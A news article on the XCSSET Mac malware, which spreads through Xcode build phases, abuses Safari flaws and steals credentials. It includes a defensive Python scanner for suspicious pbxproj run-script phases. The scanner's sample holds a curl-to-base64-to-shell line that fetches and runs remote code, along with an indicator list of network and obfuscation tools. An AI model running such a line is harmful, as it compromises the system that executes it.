Mac malware spreads through Xcode projects, abuses WebKit, Data Vault vulnerabilities

XCSSET malware focuses on exploiting Safari and other browsers.
Written by Charlie Osborne, Contributing Writer

Xcode projects are being exploited to spread a form of Mac malware specializing in the compromise of Safari and other browsers.

The XCSSET malware family has been found in Xcode projects, "lead[ing] to a rabbit hole of malicious payloads," Trend Micro said on Thursday. 

In a paper (.PDF) exploring the wave of attacks, cybersecurity researchers said an "unusual" infection in a developer's project also included the discovery of two zero-day vulnerabilities. 

Xcode is a free integrated development environment (IDE) used in macOS for developing Apple-related software and apps. 

While it is not yet clear how XCSSET worms its way into Xcode projects, Trend Micro says that once embedded, the malware then runs when a project is built. 

"Presumably, these systems would be primarily used by developers," the team noted. "These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system."

A number of impacted developers have shared their projects on GitHub, which the researchers say could result in "supply chain-like attacks for users who rely on these repositories as dependencies in their own projects."
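The article says the malicious code runs when a project is built; in Xcode, build-time commands live in run-script build phases (PBXShellScriptBuildPhase objects in project.pbxproj), so listing those is a natural first review step for a project pulled from a public repository. The scanner below is an added example, not code from the article or from Trend Micro's research; the pbxproj excerpt, object ids and indicator list are constructed for illustration.

```python
import re

# Constructed excerpt of an Xcode project.pbxproj (OpenStep plist syntax);
# the object ids, names and script bodies are made up for this example.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AB12 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			name = Lint;
			shellPath = /bin/sh;
			shellScript = "xcrun swiftlint --strict\n";
		};
		CD34 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s http://example.invalid/p | base64 -D | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# One top-level object: "<hex id> /* optional name */ = { ... };"
BLOCK = re.compile(
    r'(?P<id>[0-9A-F]+)\s*(?:/\*\s*(?P<name>.*?)\s*\*/)?\s*=\s*\{(?P<body>.*?)\n\s*\};',
    re.S)
SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"', re.S)
# Traits a reviewer would not expect in a build step of a third-party project.
INDICATORS = {
    "network fetch": r'\b(curl|wget)\b',
    "decode/obfuscation": r'\bbase64\b|\beval\b',
    "pipe to shell": r'\|\s*(ba|z)?sh\b',
    "scripting bridge": r'\bosascript\b',
}

def unescape(s: str) -> str:
    """Undo the backslash escapes pbxproj uses inside quoted strings."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)

def shell_script_phases(text: str) -> list:
    """Return every PBXShellScriptBuildPhase object as a dict (id, name, script)."""
    phases = []
    for m in BLOCK.finditer(text):
        body = m.group('body')
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        sm = SCRIPT.search(body)
        phases.append({'id': m.group('id'), 'name': m.group('name') or '',
                       'script': unescape(sm.group(1)) if sm else ''})
    return phases

def suspicious_phases(text: str) -> list:
    """Pair each run-script phase id with the indicator labels its script matches."""
    out = []
    for p in shell_script_phases(text):
        hits = [label for label, pat in INDICATORS.items() if re.search(pat, p['script'])]
        if hits:
            out.append((p['id'], hits))
    return out

if __name__ == '__main__':
    for pid, hits in suspicious_phases(SAMPLE_PBXPROJ):
        print(f"{pid}: review before building ({', '.join(hits)})")
```

Run it against the project.pbxproj inside each .xcodeproj bundle you depend on; a hit is a prompt for manual review of that build phase, not a verdict.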

Once on a vulnerable system, XCSSET homes in on browsers, including the development version of Safari, using vulnerabilities to steal user data. 

In Safari's case, the first of the two bugs is a flaw in Data Vault. A bypass method was found that circumvents the protection macOS puts in place for Safari cookie files via SSHD.

The second vulnerability of note is due to how Safari WebKit operates. Normally, launching the kit requires a user to submit their password, but a bypass was found that can be used to perform malicious operations via the un-sandboxed Safari browser. It also appears possible to perform Dylib hijacking.  

The security issues allow Safari cookies to be read and dumped, and these packets of data are then used to inject JavaScript-based backdoors into displayed pages via a Universal Cross-site Scripting (UXSS) attack.

Trend Micro believes the UXSS element of the attack chain could be used not only to steal general user information, but also as a means to modify browser sessions to display malicious websites, change cryptocurrency wallet addresses, harvest Apple Store credit card information, and steal credentials from sources including Apple ID, Google, PayPal, and Yandex.

The malware is also able to steal a variety of other user data, including Evernote content, Notes information, and communication from Skype, Telegram, QQ, and WeChat applications. 

In addition, XCSSET can take screenshots, exfiltrate data and send stolen files to a command-and-control (C2) server, and also contains a ransomware module for file encryption and blackmail demand messages. 

Only two Xcode projects harboring the malware have been found, together with 380 victim IPs -- the majority of which are located in China and India -- but the infection vector is still a significant one.  

"The method of distribution used can only be described as clever," Trend Micro says. "Affected developers will unwittingly distribute the malicious Trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files."

ZDNet has reached out to Trend Micro and Apple with additional queries and will update when we hear back. 
